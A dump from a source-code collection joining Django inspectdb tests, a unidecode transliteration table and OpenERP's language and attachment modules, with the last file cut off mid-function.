out = StringIO()
# Let's limit the introspection to tables created for models of this
# application
call_command('inspectdb',
table_name_filter=lambda tn: tn.startswith('inspectdb_'),
stdout=out)
error_message = "inspectdb has examined a table that should have been filtered out."
# contrib.contenttypes is one of the apps always installed when running
# the Django test suite, check that one of its tables hasn't been
# inspected
self.assertNotIn("class DjangoContentType(models.Model):", out.getvalue(), msg=error_message)
def make_field_type_asserter(self):
"""Call inspectdb and return a function to validate a field type in its output"""
out = StringIO()
call_command('inspectdb',
table_name_filter=lambda tn: tn.startswith('inspectdb_columntypes'),
stdout=out)
output = out.getvalue()
def assertFieldType(name, definition):
out_def = re.search(r'^\s*%s = (models.*)$' % name, output, re.MULTILINE).groups()[0]
self.assertEqual(definition, out_def)
return assertFieldType
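# Illustrative example (not in the original test file): given inspectdb
# output containing the line
#     char_field = models.CharField(max_length=10)
# the returned checker passes for
#     assertFieldType('char_field', "models.CharField(max_length=10)")
# and raises an AssertionError if the generated definition differs.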
def test_field_types(self):
"""Test introspection of various Django field types"""
assertFieldType = self.make_field_type_asserter()
# Inspecting Oracle DB doesn't produce correct results (#19884):
# - it gets max_length wrong: it returns a number of bytes.
# - it reports fields as blank=True when they aren't.
if (connection.features.can_introspect_max_length and
not connection.features.interprets_empty_strings_as_nulls):
assertFieldType('char_field', "models.CharField(max_length=10)")
assertFieldType('null_char_field', "models.CharField(max_length=10, blank=True, null=True)")
assertFieldType('comma_separated_int_field', "models.CharField(max_length=99)")
assertFieldType('date_field', "models.DateField()")
assertFieldType('date_time_field', "models.DateTimeField()")
if (connection.features.can_introspect_max_length and
not connection.features.interprets_empty_strings_as_nulls):
assertFieldType('email_field', "models.CharField(max_length=254)")
assertFieldType('file_field', "models.CharField(max_length=100)")
assertFieldType('file_path_field', "models.CharField(max_length=100)")
if connection.features.can_introspect_ip_address_field:
assertFieldType('gen_ip_adress_field', "models.GenericIPAddressField()")
elif (connection.features.can_introspect_max_length and
not connection.features.interprets_empty_strings_as_nulls):
assertFieldType('gen_ip_adress_field', "models.CharField(max_length=39)")
if (connection.features.can_introspect_max_length and
not connection.features.interprets_empty_strings_as_nulls):
assertFieldType('slug_field', "models.CharField(max_length=50)")
if not connection.features.interprets_empty_strings_as_nulls:
assertFieldType('text_field', "models.TextField()")
if connection.features.can_introspect_time_field:
assertFieldType('time_field', "models.TimeField()")
if (connection.features.can_introspect_max_length and
not connection.features.interprets_empty_strings_as_nulls):
assertFieldType('url_field', "models.CharField(max_length=200)")
def test_number_field_types(self):
"""Test introspection of various Django field types"""
assertFieldType = self.make_field_type_asserter()
if not connection.features.can_introspect_autofield:
assertFieldType('id', "models.IntegerField(primary_key=True) # AutoField?")
if connection.features.can_introspect_big_integer_field:
assertFieldType('big_int_field', "models.BigIntegerField()")
else:
assertFieldType('big_int_field', "models.IntegerField()")
bool_field = ColumnTypes._meta.get_field('bool_field')
bool_field_type = connection.features.introspected_boolean_field_type(bool_field)
assertFieldType('bool_field', "models.{}()".format(bool_field_type))
null_bool_field = ColumnTypes._meta.get_field('null_bool_field')
null_bool_field_type = connection.features.introspected_boolean_field_type(null_bool_field)
if 'BooleanField' in null_bool_field_type:
assertFieldType('null_bool_field', "models.{}()".format(null_bool_field_type))
else:
if connection.features.can_introspect_null:
assertFieldType('null_bool_field', "models.{}(blank=True, null=True)".format(null_bool_field_type))
else:
assertFieldType('null_bool_field', "models.{}()".format(null_bool_field_type))
if connection.features.can_introspect_decimal_field:
assertFieldType('decimal_field', "models.DecimalField(max_digits=6, decimal_places=1)")
else: # Guessed arguments on SQLite, see #5014
assertFieldType('decimal_field', "models.DecimalField(max_digits=10, decimal_places=5) "
"# max_digits and decimal_places have been guessed, "
"as this database handles decimal fields as float")
assertFieldType('float_field', "models.FloatField()")
assertFieldType('int_field', "models.IntegerField()")
if connection.features.can_introspect_positive_integer_field:
assertFieldType('pos_int_field', "models.PositiveIntegerField()")
else:
assertFieldType('pos_int_field', "models.IntegerField()")
if connection.features.can_introspect_positive_integer_field:
if connection.features.can_introspect_small_integer_field:
assertFieldType('pos_small_int_field', "models.PositiveSmallIntegerField()")
else:
assertFieldType('pos_small_int_field', "models.PositiveIntegerField()")
else:
if connection.features.can_introspect_small_integer_field:
assertFieldType('pos_small_int_field', "models.SmallIntegerField()")
else:
assertFieldType('pos_small_int_field', "models.IntegerField()")
if connection.features.can_introspect_small_integer_field:
assertFieldType('small_int_field', "models.SmallIntegerField()")
else:
assertFieldType('small_int_field', "models.IntegerField()")
@skipUnlessDBFeature('can_introspect_foreign_keys')
def test_attribute_name_not_python_keyword(self):
out = StringIO()
# Let's limit the introspection to tables created for models of this
# application
call_command('inspectdb',
table_name_filter=lambda tn: tn.startswith('inspectdb_'),
stdout=out)
output = out.getvalue()
error_message = "inspectdb generated an attribute name which is a python keyword"
# Recursive foreign keys should be set to 'self'
self.assertIn("parent = models.ForeignKey('self')", output)
self.assertNotIn("from = models.ForeignKey(InspectdbPeople)", output, msg=error_message)
# As InspectdbPeople model is defined after InspectdbMessage, it should be quoted
self.assertIn("from_field = models.ForeignKey('InspectdbPeople', db_column='from_id')",
output)
self.assertIn("people_pk = models.ForeignKey(InspectdbPeople, primary_key=True)",
output)
self.assertIn("people_unique = models.ForeignKey(InspectdbPeople, unique=True)",
output)
def test_digits_column_name_introspection(self):
"""Introspection of column names consist/start with digits (#16536/#17676)"""
out = StringIO()
# Let's limit the introspection to tables created for models of this
# application
call_command('inspectdb',
table_name_filter=lambda tn: tn.startswith('inspectdb_'),
stdout=out)
output = out.getvalue()
error_message = "inspectdb generated a model field name which is a number"
self.assertNotIn(" 123 = models.CharField", output, msg=error_message)
self.assertIn("number_123 = models.CharField", output)
error_message = "inspectdb generated a model field name which starts with a digit"
self.assertNotIn(" 4extra = models.CharField", output, msg=error_message)
self.assertIn("number_4extra = models.CharField", output)
self.assertNotIn(" 45extra = models.CharField", output, msg=error_message)
self.assertIn("number_45extra = models.CharField", output)
def test_special_column_name_introspection(self):
"""
Introspection of column names containing special characters,
unsuitable for Python identifiers
"""
out = StringIO()
call_command('inspectdb',
table_name_filter=lambda tn: tn.startswith('inspectdb_'),
stdout=out)
output = out.getvalue()
base_name = 'Field' if not connection.features.uppercases_column_names else 'field'
self.assertIn("field = models.IntegerField()", output)
self.assertIn("field_field = models.IntegerField(db_column='%s_')" % base_name, output)
self.assertIn("field_field_0 = models.IntegerField(db_column='%s__')" % base_name, output)
self.assertIn("field_field_1 = models.IntegerField(db_column='__field')", output)
self.assertIn("prc_x = models.IntegerField(db_column='prc(%) x')", output)
if PY3:
# Python 3 allows non-ASCII identifiers
self.assertIn("tamaño = models.IntegerField()", output)
else:
self.assertIn("tama_o = models.IntegerField(db_column='tama\\xf1o')", output)
def test_table_name_introspection(self):
"""
Introspection of table names containing special characters,
unsuitable for Python identifiers
"""
out = StringIO()
call_command('inspectdb',
table_name_filter=lambda tn: tn.startswith('inspectdb_'),
stdout=out)
output = out.getvalue()
self.assertIn("class InspectdbSpecialTableName(models.Model):", output)
def test_managed_models(self):
"""Test that by default the command generates models with `Meta.managed = False` (#14305)"""
out = StringIO()
call_command('inspectdb',
table_name_filter=lambda tn: tn.startswith('inspectdb_columntypes'),
stdout=out)
output = out.getvalue()
self.longMessage = False
self.assertIn(" managed = False", output, msg='inspectdb should generate unmanaged models.')
def test_unique_together_meta(self):
out = StringIO()
call_command('inspectdb',
table_name_filter=lambda tn: tn.startswith('inspectdb_uniquetogether'),
stdout=out)
output = out.getvalue()
self.assertIn(" unique_together = (('field1', 'field2'),)", output, msg='inspectdb should generate unique_together.')
@skipUnless(connection.vendor == 'sqlite',
"Only patched sqlite's DatabaseIntrospection.data_types_reverse for this test")
def test_custom_fields(self):
"""
Introspection of columns with a custom field (#21090)
"""
out = StringIO()
orig_data_types_reverse = connection.introspection.data_types_reverse
try:
connection.introspection.data_types_reverse = {
'text': 'myfields.TextField',
'bigint': 'BigIntegerField',
}
call_command('inspectdb',
table_name_filter=lambda tn: tn.startswith('inspectdb_columntypes'),
stdout=out)
output = out.getvalue()
self.assertIn("text_field = myfields.TextField()", output)
self.assertIn("big_int_field = models.BigIntegerField()", output)
finally:
connection.introspection.data_types_reverse = orig_data_types_reverse
| bsd-3-clause |
grantsewell/nzbToMedia | libs/unidecode/x099.py | 252 | 4629 | data = (
'Hai ', # 0x00
'Ren ', # 0x01
'Tian ', # 0x02
'Jiao ', # 0x03
'Jia ', # 0x04
'Bing ', # 0x05
'Yao ', # 0x06
'Tong ', # 0x07
'Ci ', # 0x08
'Xiang ', # 0x09
'Yang ', # 0x0a
'Yang ', # 0x0b
'Er ', # 0x0c
'Yan ', # 0x0d
'Le ', # 0x0e
'Yi ', # 0x0f
'Can ', # 0x10
'Bo ', # 0x11
'Nei ', # 0x12
'E ', # 0x13
'Bu ', # 0x14
'Jun ', # 0x15
'Dou ', # 0x16
'Su ', # 0x17
'Yu ', # 0x18
'Shi ', # 0x19
'Yao ', # 0x1a
'Hun ', # 0x1b
'Guo ', # 0x1c
'Shi ', # 0x1d
'Jian ', # 0x1e
'Zhui ', # 0x1f
'Bing ', # 0x20
'Xian ', # 0x21
'Bu ', # 0x22
'Ye ', # 0x23
'Tan ', # 0x24
'Fei ', # 0x25
'Zhang ', # 0x26
'Wei ', # 0x27
'Guan ', # 0x28
'E ', # 0x29
'Nuan ', # 0x2a
'Hun ', # 0x2b
'Hu ', # 0x2c
'Huang ', # 0x2d
'Tie ', # 0x2e
'Hui ', # 0x2f
'Jian ', # 0x30
'Hou ', # 0x31
'He ', # 0x32
'Xing ', # 0x33
'Fen ', # 0x34
'Wei ', # 0x35
'Gu ', # 0x36
'Cha ', # 0x37
'Song ', # 0x38
'Tang ', # 0x39
'Bo ', # 0x3a
'Gao ', # 0x3b
'Xi ', # 0x3c
'Kui ', # 0x3d
'Liu ', # 0x3e
'Sou ', # 0x3f
'Tao ', # 0x40
'Ye ', # 0x41
'Yun ', # 0x42
'Mo ', # 0x43
'Tang ', # 0x44
'Man ', # 0x45
'Bi ', # 0x46
'Yu ', # 0x47
'Xiu ', # 0x48
'Jin ', # 0x49
'San ', # 0x4a
'Kui ', # 0x4b
'Zhuan ', # 0x4c
'Shan ', # 0x4d
'Chi ', # 0x4e
'Dan ', # 0x4f
'Yi ', # 0x50
'Ji ', # 0x51
'Rao ', # 0x52
'Cheng ', # 0x53
'Yong ', # 0x54
'Tao ', # 0x55
'Hui ', # 0x56
'Xiang ', # 0x57
'Zhan ', # 0x58
'Fen ', # 0x59
'Hai ', # 0x5a
'Meng ', # 0x5b
'Yan ', # 0x5c
'Mo ', # 0x5d
'Chan ', # 0x5e
'Xiang ', # 0x5f
'Luo ', # 0x60
'Zuan ', # 0x61
'Nang ', # 0x62
'Shi ', # 0x63
'Ding ', # 0x64
'Ji ', # 0x65
'Tuo ', # 0x66
'Xing ', # 0x67
'Tun ', # 0x68
'Xi ', # 0x69
'Ren ', # 0x6a
'Yu ', # 0x6b
'Chi ', # 0x6c
'Fan ', # 0x6d
'Yin ', # 0x6e
'Jian ', # 0x6f
'Shi ', # 0x70
'Bao ', # 0x71
'Si ', # 0x72
'Duo ', # 0x73
'Yi ', # 0x74
'Er ', # 0x75
'Rao ', # 0x76
'Xiang ', # 0x77
'Jia ', # 0x78
'Le ', # 0x79
'Jiao ', # 0x7a
'Yi ', # 0x7b
'Bing ', # 0x7c
'Bo ', # 0x7d
'Dou ', # 0x7e
'E ', # 0x7f
'Yu ', # 0x80
'Nei ', # 0x81
'Jun ', # 0x82
'Guo ', # 0x83
'Hun ', # 0x84
'Xian ', # 0x85
'Guan ', # 0x86
'Cha ', # 0x87
'Kui ', # 0x88
'Gu ', # 0x89
'Sou ', # 0x8a
'Chan ', # 0x8b
'Ye ', # 0x8c
'Mo ', # 0x8d
'Bo ', # 0x8e
'Liu ', # 0x8f
'Xiu ', # 0x90
'Jin ', # 0x91
'Man ', # 0x92
'San ', # 0x93
'Zhuan ', # 0x94
'Nang ', # 0x95
'Shou ', # 0x96
'Kui ', # 0x97
'Guo ', # 0x98
'Xiang ', # 0x99
'Fen ', # 0x9a
'Ba ', # 0x9b
'Ni ', # 0x9c
'Bi ', # 0x9d
'Bo ', # 0x9e
'Tu ', # 0x9f
'Han ', # 0xa0
'Fei ', # 0xa1
'Jian ', # 0xa2
'An ', # 0xa3
'Ai ', # 0xa4
'Fu ', # 0xa5
'Xian ', # 0xa6
'Wen ', # 0xa7
'Xin ', # 0xa8
'Fen ', # 0xa9
'Bin ', # 0xaa
'Xing ', # 0xab
'Ma ', # 0xac
'Yu ', # 0xad
'Feng ', # 0xae
'Han ', # 0xaf
'Di ', # 0xb0
'Tuo ', # 0xb1
'Tuo ', # 0xb2
'Chi ', # 0xb3
'Xun ', # 0xb4
'Zhu ', # 0xb5
'Zhi ', # 0xb6
'Pei ', # 0xb7
'Xin ', # 0xb8
'Ri ', # 0xb9
'Sa ', # 0xba
'Yin ', # 0xbb
'Wen ', # 0xbc
'Zhi ', # 0xbd
'Dan ', # 0xbe
'Lu ', # 0xbf
'You ', # 0xc0
'Bo ', # 0xc1
'Bao ', # 0xc2
'Kuai ', # 0xc3
'Tuo ', # 0xc4
'Yi ', # 0xc5
'Qu ', # 0xc6
'[?] ', # 0xc7
'Qu ', # 0xc8
'Jiong ', # 0xc9
'Bo ', # 0xca
'Zhao ', # 0xcb
'Yuan ', # 0xcc
'Peng ', # 0xcd
'Zhou ', # 0xce
'Ju ', # 0xcf
'Zhu ', # 0xd0
'Nu ', # 0xd1
'Ju ', # 0xd2
'Pi ', # 0xd3
'Zang ', # 0xd4
'Jia ', # 0xd5
'Ling ', # 0xd6
'Zhen ', # 0xd7
'Tai ', # 0xd8
'Fu ', # 0xd9
'Yang ', # 0xda
'Shi ', # 0xdb
'Bi ', # 0xdc
'Tuo ', # 0xdd
'Tuo ', # 0xde
'Si ', # 0xdf
'Liu ', # 0xe0
'Ma ', # 0xe1
'Pian ', # 0xe2
'Tao ', # 0xe3
'Zhi ', # 0xe4
'Rong ', # 0xe5
'Teng ', # 0xe6
'Dong ', # 0xe7
'Xun ', # 0xe8
'Quan ', # 0xe9
'Shen ', # 0xea
'Jiong ', # 0xeb
'Er ', # 0xec
'Hai ', # 0xed
'Bo ', # 0xee
'Zhu ', # 0xef
'Yin ', # 0xf0
'Luo ', # 0xf1
'Shuu ', # 0xf2
'Dan ', # 0xf3
'Xie ', # 0xf4
'Liu ', # 0xf5
'Ju ', # 0xf6
'Song ', # 0xf7
'Qin ', # 0xf8
'Mang ', # 0xf9
'Liang ', # 0xfa
'Han ', # 0xfb
'Tu ', # 0xfc
'Xuan ', # 0xfd
'Tui ', # 0xfe
'Jun ', # 0xff
)
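# Illustrative usage sketch (hedged; not part of the generated table): the
# unidecode package indexes tables like this one by the low byte of the code
# point, so for a character in the U+99xx block the transliteration is
# roughly:
#
#   ch = u'\u9900'
#   transliteration = data[ord(ch) & 0xff]   # -> 'Hai '
#
# The exact dispatch lives in unidecode's __init__ and may differ by version.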
| gpl-3.0 |
OSSESAC/odoopubarquiluz | openerp/addons/base/res/res_lang.py | 34 | 14785 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import locale
from locale import localeconv
import logging
import re
from openerp import tools
from openerp.osv import fields, osv
from openerp.tools.safe_eval import safe_eval as eval
from openerp.tools.translate import _
_logger = logging.getLogger(__name__)
class lang(osv.osv):
_name = "res.lang"
_description = "Languages"
_disallowed_datetime_patterns = tools.DATETIME_FORMATS_MAP.keys()
_disallowed_datetime_patterns.remove('%y') # this one is in fact allowed, just not good practice
def install_lang(self, cr, uid, **args):
"""
This method is called from openerp/addons/base/base_data.xml to load
some language and set it as the default for every partner. The
language is set via tools.config by the RPC 'create' method on the
'db' object. This is a fragile solution and something else should be
found.
"""
lang = tools.config.get('lang')
if not lang:
return False
lang_ids = self.search(cr, uid, [('code','=', lang)])
if not lang_ids:
self.load_lang(cr, uid, lang)
ir_values_obj = self.pool.get('ir.values')
default_value = ir_values_obj.get(cr, uid, 'default', False, ['res.partner'])
if not default_value:
ir_values_obj.set(cr, uid, 'default', False, 'lang', ['res.partner'], lang)
return True
def load_lang(self, cr, uid, lang, lang_name=None):
# create the language with locale information
fail = True
iso_lang = tools.get_iso_codes(lang)
for ln in tools.get_locales(lang):
try:
locale.setlocale(locale.LC_ALL, str(ln))
fail = False
break
except locale.Error:
continue
if fail:
lc = locale.getdefaultlocale()[0]
msg = 'Unable to get information for locale %s. Information from the default locale (%s) has been used.'
_logger.warning(msg, lang, lc)
if not lang_name:
lang_name = tools.ALL_LANGUAGES.get(lang, lang)
def fix_xa0(s):
"""Fix badly-encoded non-breaking space Unicode character from locale.localeconv(),
coercing to utf-8, as some platform seem to output localeconv() in their system
encoding, e.g. Windows-1252"""
if s == '\xa0':
return '\xc2\xa0'
return s
def fix_datetime_format(format):
"""Python's strftime supports only the format directives
that are available on the platform's libc, so in order to
be 100% cross-platform we map to the directives required by
the C standard (1989 version), always available on platforms
with a C standard implementation."""
for pattern, replacement in tools.DATETIME_FORMATS_MAP.iteritems():
format = format.replace(pattern, replacement)
return str(format)
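# Hedged sketch of the substitution above: if DATETIME_FORMATS_MAP contained,
# say, {'%P': '%p'}, then a locale format such as '%I:%M %P' would be
# rewritten to '%I:%M %p'. The real map contents are defined in openerp.tools
# and are not reproduced here.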
lang_info = {
'code': lang,
'iso_code': iso_lang,
'name': lang_name,
'translatable': 1,
'date_format' : fix_datetime_format(locale.nl_langinfo(locale.D_FMT)),
'time_format' : fix_datetime_format(locale.nl_langinfo(locale.T_FMT)),
'decimal_point' : fix_xa0(str(locale.localeconv()['decimal_point'])),
'thousands_sep' : fix_xa0(str(locale.localeconv()['thousands_sep'])),
}
lang_id = False
try:
lang_id = self.create(cr, uid, lang_info)
finally:
tools.resetlocale()
return lang_id
def _check_format(self, cr, uid, ids, context=None):
for lang in self.browse(cr, uid, ids, context=context):
for pattern in self._disallowed_datetime_patterns:
if (lang.time_format and pattern in lang.time_format)\
or (lang.date_format and pattern in lang.date_format):
return False
return True
def _get_default_date_format(self, cursor, user, context=None):
return '%m/%d/%Y'
def _get_default_time_format(self, cursor, user, context=None):
return '%H:%M:%S'
_columns = {
'name': fields.char('Name', size=64, required=True),
'code': fields.char('Locale Code', size=16, required=True, help='This field is used to set/get locales for user'),
'iso_code': fields.char('ISO code', size=16, required=False, help='This ISO code is the name of po files to use for translations'),
'translatable': fields.boolean('Translatable'),
'active': fields.boolean('Active'),
'direction': fields.selection([('ltr', 'Left-to-Right'), ('rtl', 'Right-to-Left')], 'Direction',required=True),
'date_format':fields.char('Date Format',size=64,required=True),
'time_format':fields.char('Time Format',size=64,required=True),
'grouping':fields.char('Separator Format',size=64,required=True,help="The Separator Format should be like [,n] where 0 < n :starting from Unit digit.-1 will end the separation. e.g. [3,2,-1] will represent 106500 to be 1,06,500;[1,2,-1] will represent it to be 106,50,0;[3] will represent it as 106,500. Provided ',' as the thousand separator in each case."),
'decimal_point':fields.char('Decimal Separator', size=64,required=True),
'thousands_sep':fields.char('Thousands Separator',size=64),
}
_defaults = {
'active': 1,
'translatable': 0,
'direction': 'ltr',
'date_format':_get_default_date_format,
'time_format':_get_default_time_format,
'grouping': '[]',
'decimal_point': '.',
'thousands_sep': ',',
}
_sql_constraints = [
('name_uniq', 'unique (name)', 'The name of the language must be unique !'),
('code_uniq', 'unique (code)', 'The code of the language must be unique !'),
]
_constraints = [
(_check_format, 'Invalid date/time format directive specified. Please refer to the list of allowed directives, displayed when you edit a language.', ['time_format', 'date_format'])
]
@tools.ormcache(skiparg=3)
def _lang_data_get(self, cr, uid, lang_id, monetary=False):
conv = localeconv()
lang_obj = self.browse(cr, uid, lang_id)
thousands_sep = lang_obj.thousands_sep or conv[monetary and 'mon_thousands_sep' or 'thousands_sep']
decimal_point = lang_obj.decimal_point
grouping = lang_obj.grouping
return grouping, thousands_sep, decimal_point
def write(self, cr, uid, ids, vals, context=None):
for lang_id in ids :
self._lang_data_get.clear_cache(self)
return super(lang, self).write(cr, uid, ids, vals, context)
def unlink(self, cr, uid, ids, context=None):
if context is None:
context = {}
languages = self.read(cr, uid, ids, ['code','active'], context=context)
for language in languages:
ctx_lang = context.get('lang')
if language['code']=='en_US':
raise osv.except_osv(_('User Error'), _("Base Language 'en_US' can not be deleted!"))
if ctx_lang and (language['code']==ctx_lang):
raise osv.except_osv(_('User Error'), _("You cannot delete the language which is User's Preferred Language!"))
if language['active']:
raise osv.except_osv(_('User Error'), _("You cannot delete the language which is Active!\nPlease de-activate the language first."))
trans_obj = self.pool.get('ir.translation')
trans_ids = trans_obj.search(cr, uid, [('lang','=',language['code'])], context=context)
trans_obj.unlink(cr, uid, trans_ids, context=context)
return super(lang, self).unlink(cr, uid, ids, context=context)
def format(self, cr, uid, ids, percent, value, grouping=False, monetary=False, context=None):
""" Format() will return the language-specific output for float values"""
if percent[0] != '%':
raise ValueError("format() must be given exactly one %char format specifier")
lang_grouping, thousands_sep, decimal_point = self._lang_data_get(cr, uid, ids[0], monetary)
eval_lang_grouping = eval(lang_grouping)
formatted = percent % value
# floats and decimal ints need special action!
if percent[-1] in 'eEfFgG':
seps = 0
parts = formatted.split('.')
if grouping:
parts[0], seps = intersperse(parts[0], eval_lang_grouping, thousands_sep)
formatted = decimal_point.join(parts)
while seps:
sp = formatted.find(' ')
if sp == -1: break
formatted = formatted[:sp] + formatted[sp+1:]
seps -= 1
elif percent[-1] in 'diu':
if grouping:
formatted = intersperse(formatted, eval_lang_grouping, thousands_sep)[0]
return formatted
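# Illustrative call (hedged): for a language record with grouping '[3,0]',
# thousands_sep ',' and decimal_point '.', something like
#   lang_obj.format(cr, uid, [lang_id], '%.2f', 1234567.8, grouping=True)
# would return '1,234,567.80'. Actual output depends on the stored
# grouping/separator values for the language.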
# import re, operator
# _percent_re = re.compile(r'%(?:\((?P<key>.*?)\))?'
# r'(?P<modifiers>[-#0-9 +*.hlL]*?)[eEfFgGdiouxXcrs%]')
lang()
def original_group(s, grouping, thousands_sep=''):
if not grouping:
return s, 0
result = ""
seps = 0
spaces = ""
if s[-1] == ' ':
sp = s.find(' ')
spaces = s[sp:]
s = s[:sp]
while s and grouping:
# if grouping is -1, we are done
if grouping[0] == -1:
break
# 0: re-use last group ad infinitum
elif grouping[0] != 0:
# process last group
group = grouping[0]
grouping = grouping[1:]
if result:
result = s[-group:] + thousands_sep + result
seps += 1
else:
result = s[-group:]
s = s[:-group]
if s and s[-1] not in "0123456789":
# the leading string is only spaces and signs
return s + result + spaces, seps
if not result:
return s + spaces, seps
if s:
result = s + thousands_sep + result
seps += 1
return result + spaces, seps
def split(l, counts):
"""
>>> split("hello world", [])
['hello world']
>>> split("hello world", [1])
['h', 'ello world']
>>> split("hello world", [2])
['he', 'llo world']
>>> split("hello world", [2,3])
['he', 'llo', ' world']
>>> split("hello world", [2,3,0])
['he', 'llo', ' wo', 'rld']
>>> split("hello world", [2,-1,3])
['he', 'llo world']
"""
res = []
saved_count = len(l) # count to use when encountering a zero
for count in counts:
if not l:
break
if count == -1:
break
if count == 0:
while l:
res.append(l[:saved_count])
l = l[saved_count:]
break
res.append(l[:count])
l = l[count:]
saved_count = count
if l:
res.append(l)
return res
intersperse_pat = re.compile('([^0-9]*)([^ ]*)(.*)')
def intersperse(string, counts, separator=''):
"""
See the asserts below for examples.
"""
left, rest, right = intersperse_pat.match(string).groups()
def reverse(s): return s[::-1]
splits = split(reverse(rest), counts)
res = separator.join(map(reverse, reverse(splits)))
return left + res + right, len(splits) > 0 and len(splits) -1 or 0
# TODO rewrite this with a unit test library
def _group_examples():
for g in [original_group, intersperse]:
# print "asserts on", g.func_name
assert g("", []) == ("", 0)
assert g("0", []) == ("0", 0)
assert g("012", []) == ("012", 0)
assert g("1", []) == ("1", 0)
assert g("12", []) == ("12", 0)
assert g("123", []) == ("123", 0)
assert g("1234", []) == ("1234", 0)
assert g("123456789", []) == ("123456789", 0)
assert g("&ab%#@1", []) == ("&ab%#@1", 0)
assert g("0", []) == ("0", 0)
assert g("0", [1]) == ("0", 0)
assert g("0", [2]) == ("0", 0)
assert g("0", [200]) == ("0", 0)
# breaks original_group:
if g.func_name == 'intersperse':
assert g("12345678", [0], '.') == ('12345678', 0)
assert g("", [1], '.') == ('', 0)
assert g("12345678", [1], '.') == ('1234567.8', 1)
assert g("12345678", [1], '.') == ('1234567.8', 1)
assert g("12345678", [2], '.') == ('123456.78', 1)
assert g("12345678", [2,1], '.') == ('12345.6.78', 2)
assert g("12345678", [2,0], '.') == ('12.34.56.78', 3)
assert g("12345678", [-1,2], '.') == ('12345678', 0)
assert g("12345678", [2,-1], '.') == ('123456.78', 1)
assert g("12345678", [2,0,1], '.') == ('12.34.56.78', 3)
assert g("12345678", [2,0,0], '.') == ('12.34.56.78', 3)
assert g("12345678", [2,0,-1], '.') == ('12.34.56.78', 3)
assert g("12345678", [3,3,3,3], '.') == ('12.345.678', 2)
assert original_group("abc1234567xy", [2], '.') == ('abc1234567.xy', 1)
assert original_group("abc1234567xy8", [2], '.') == ('abc1234567xy8', 0) # difference here...
assert original_group("abc12", [3], '.') == ('abc12', 0)
assert original_group("abc12", [2], '.') == ('abc12', 0)
assert original_group("abc12", [1], '.') == ('abc1.2', 1)
assert intersperse("abc1234567xy", [2], '.') == ('abc1234567.xy', 1)
assert intersperse("abc1234567xy8", [2], '.') == ('abc1234567x.y8', 1) # ... w.r.t. here.
assert intersperse("abc12", [3], '.') == ('abc12', 0)
assert intersperse("abc12", [2], '.') == ('abc12', 0)
assert intersperse("abc12", [1], '.') == ('abc1.2', 1)
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
oscarolar/odoo | openerp/addons/base/ir/ir_attachment.py | 4 | 15096 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import hashlib
import itertools
import logging
import os
import re
from openerp import tools
from openerp.tools.translate import _
from openerp.exceptions import AccessError
from openerp.osv import fields,osv
from openerp import SUPERUSER_ID
_logger = logging.getLogger(__name__)
class ir_attachment(osv.osv):
"""Attachments are used to link binary files or url to any openerp document.
External attachment storage
---------------------------
The 'data' function field (_data_get, _data_set) is implemented using
_file_read, _file_write and _file_delete, which can be overridden to
implement other storage engines; such methods should check for other
location pseudo URIs (example: hdfs://hadoopserver)
The default implementation is the file:dirname location that stores files
on the local filesystem using names based on their sha1 hash
"""
_order = 'id desc'
def _name_get_resname(self, cr, uid, ids, object, method, context):
data = {}
for attachment in self.browse(cr, uid, ids, context=context):
model_object = attachment.res_model
res_id = attachment.res_id
if model_object and res_id:
model_pool = self.pool[model_object]
res = model_pool.name_get(cr,uid,[res_id],context)
res_name = res and res[0][1] or False
if res_name:
field = self._columns.get('res_name',False)
if field and len(res_name) > field.size:
res_name = res_name[:30] + '...'
data[attachment.id] = res_name
else:
data[attachment.id] = False
return data
def _storage(self, cr, uid, context=None):
return self.pool['ir.config_parameter'].get_param(cr, SUPERUSER_ID, 'ir_attachment.location', 'file')
@tools.ormcache()
def _filestore(self, cr, uid, context=None):
return tools.config.filestore(cr.dbname)
def force_storage(self, cr, uid, context=None):
"""Force all attachments to be stored in the currently configured storage"""
if not self.pool['res.users'].has_group(cr, uid, 'base.group_erp_manager'):
raise AccessError(_('Only administrators can execute this action.'))
location = self._storage(cr, uid, context)
domain = {
'db': [('store_fname', '!=', False)],
'file': [('db_datas', '!=', False)],
}[location]
ids = self.search(cr, uid, domain, context=context)
for attach in self.browse(cr, uid, ids, context=context):
attach.write({'datas': attach.datas})
return True
# 'data' field implementation
def _full_path(self, cr, uid, path):
# sanitize path
path = re.sub('[.]', '', path)
path = path.strip('/\\')
return os.path.join(self._filestore(cr, uid), path)
def _get_path(self, cr, uid, bin_data):
sha = hashlib.sha1(bin_data).hexdigest()
# retro compatibility
fname = sha[:3] + '/' + sha
full_path = self._full_path(cr, uid, fname)
if os.path.isfile(full_path):
return fname, full_path # keep existing path
# scatter files across 256 dirs
# we use '/' in the db (even on windows)
fname = sha[:2] + '/' + sha
full_path = self._full_path(cr, uid, fname)
dirname = os.path.dirname(full_path)
if not os.path.isdir(dirname):
os.makedirs(dirname)
return fname, full_path
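# Resulting layout (illustrative): a file whose base64-decoded content hashes
# to sha1 'ab12...' is stored under <filestore>/ab/ab12..., i.e. the first
# two hex digits select one of 256 directories; older attachments may still
# live under the legacy three-character scheme handled above.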
def _file_read(self, cr, uid, fname, bin_size=False):
full_path = self._full_path(cr, uid, fname)
r = ''
try:
if bin_size:
r = os.path.getsize(full_path)
else:
r = open(full_path,'rb').read().encode('base64')
except IOError:
